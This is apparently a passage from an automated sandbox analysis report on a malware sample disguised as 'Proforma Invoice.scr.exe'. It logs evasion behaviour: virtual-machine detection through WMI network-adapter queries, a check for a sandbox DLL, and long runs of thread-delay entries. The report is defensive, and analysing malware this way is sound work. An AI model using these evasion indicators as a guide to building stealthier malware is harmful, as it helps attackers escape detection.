                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.scr.exe PID: 4000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EncoderFallback.exe PID: 6828, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: Proforma Invoice.scr.exe, 00000000.00000002.2454133386.0000000002618000.00000004.00000800.00020000.00000000.sdmp, EncoderFallback.exe, 00000006.00000002.2753904041.0000000002C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeMemory allocated: 8E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeMemory allocated: 2570000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeMemory allocated: 4570000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory allocated: 2B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeMemory allocated: 4B90000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599436Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599318Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599179Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598999Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598816Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598685Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597484Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597046Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596936Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596824Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596718Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596317Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596180Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596030Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595898Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595653Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595422Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594616Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594498Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594389Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594171Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593953Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599655Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598531Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598421Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596750Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595843Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594937Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594718Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594500Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeWindow / User API: threadDelayed 2706Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exeWindow / User API: threadDelayed 7055Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6535Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3269Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeWindow / User API: threadDelayed 3989Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\EncoderFallback.exeWindow / User API: threadDelayed 3991Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8512Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 6424Thread sleep count: 2706 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 6424Thread sleep count: 7055 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -99766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -99438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -99313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -99188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -99063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -98953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -98844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -98628s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -98476s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -98373s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -98172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -98031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -97922s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -97774s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -97621s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -97486s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -97374s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -97262s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -97156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -97047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -96938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -96828s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -96719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -96610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -96485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -96360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -96235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -96110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -95985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -95860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -95735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -95610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -95485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -95360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -95235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -95110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -94985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -94860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -94672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -94542s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -94254s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -94121s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -93967s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -93858s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -93750s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -93641s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Proforma Invoice.scr.exe TID: 1808Thread sleep time: -93516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep count: 36 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -599891s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3556Thread sleep count: 6535 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3556Thread sleep count: 3269 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -599436s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -599318s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -599179s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -598999s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -598816s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -598685s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -598578s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -598469s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -598359s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -598250s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -598140s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6008Thread sleep time: -598031s >= -30000sJump to behavior
